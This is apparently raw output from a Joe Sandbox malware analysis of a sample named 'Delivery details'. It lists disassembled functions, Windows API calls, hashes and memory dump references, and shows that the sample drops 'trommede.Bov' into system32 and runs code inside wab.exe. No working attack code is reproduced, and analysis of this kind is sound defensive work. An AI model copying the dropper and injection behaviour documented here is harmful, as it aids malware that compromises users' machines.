Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8

Uniqueness

Uniqueness Score: -1.00%

Function 004058E3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926
GetLastError.KERNEL32 ref: 0040593A
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
GetLastError.KERNEL32 ref: 00405959

Strings

C:\Users\user\Desktop, xrefs: 004058E3

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1246513382
Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1ea1aa3a4bcd63a739838081bd04b2b88c3f6ba45a3f467952025c05557b9ef3
Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
Opcode Fuzzy Hash: 1ea1aa3a4bcd63a739838081bd04b2b88c3f6ba45a3f467952025c05557b9ef3
Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,C:\Windows\system32\trommede.Bov,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Windows\system32\trommede.Bov,?,?,0040B5D8,000000FF,C:\Windows\system32\trommede.Bov,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Windows\system32\trommede.Bov, xrefs: 004025AD, 004025D4, 004025E8, 00402634

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Windows\system32\trommede.Bov
API String ID: 3109718747-2695231187
Opcode ID: f874f6638e6c7012de2fa98dcecffd1fa0cc6476bd4a08a5713b7dee10837727
Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
Opcode Fuzzy Hash: f874f6638e6c7012de2fa98dcecffd1fa0cc6476bd4a08a5713b7dee10837727
Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C81 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00405D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D3A
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405DE2
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405DF2

Strings

0_B, xrefs: 00405D8F

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053B7
CallWindowProcW.USER32(?,?,?,?), ref: 00405408

Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

Strings

, xrefs: 00405398

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69

Uniqueness

Uniqueness Score: -1.00%

Function 00403A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,00403A00,75923420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
GlobalFree.KERNEL32(?), ref: 00403A4A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00405CCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CD3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CE3

Strings

C:\Users\user\Desktop, xrefs: 00405CCD

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E07 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wab.exePID: 4400, Parent PID: 1084COMMON

Executed Functions

Function 02A5D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee12c86b43616e1054de0460f5ccc64c75cfd214e03c6246709f9617a5a48176
Instruction ID: 5288b9af918039f415ae1701df3ed581ebcdc87791dcf24fb5cd881725b8f8fd
Opcode Fuzzy Hash: ee12c86b43616e1054de0460f5ccc64c75cfd214e03c6246709f9617a5a48176
Instruction Fuzzy Hash: 2C21F2B1604604EFDB15DF24D9C4B27BB65FF88314F24C96DEC4A4B246CB3AD846CA62

Uniqueness

Uniqueness Score: -1.00%

Function 02A8EA00 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3266100788.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78fd7bffeb03122f1e87635ab6a0111f423ac94ebe43eede2727684cd8c731a7
Instruction ID: 6b6b67b7ac9a05a265b19eb165c3fc7b9a0d19e0c06c5a6650de51ac420b6510
Opcode Fuzzy Hash: 78fd7bffeb03122f1e87635ab6a0111f423ac94ebe43eede2727684cd8c731a7
Instruction Fuzzy Hash: BC4125B2D043599FCB14DFB9D8446AEFBF5EF89310F04856AE404A7241DB38A944CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 02A8EAD0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A8EA52), ref: 02A8EB3F

Memory Dump Source

Source File: 00000006.00000002.3266100788.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_wab.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
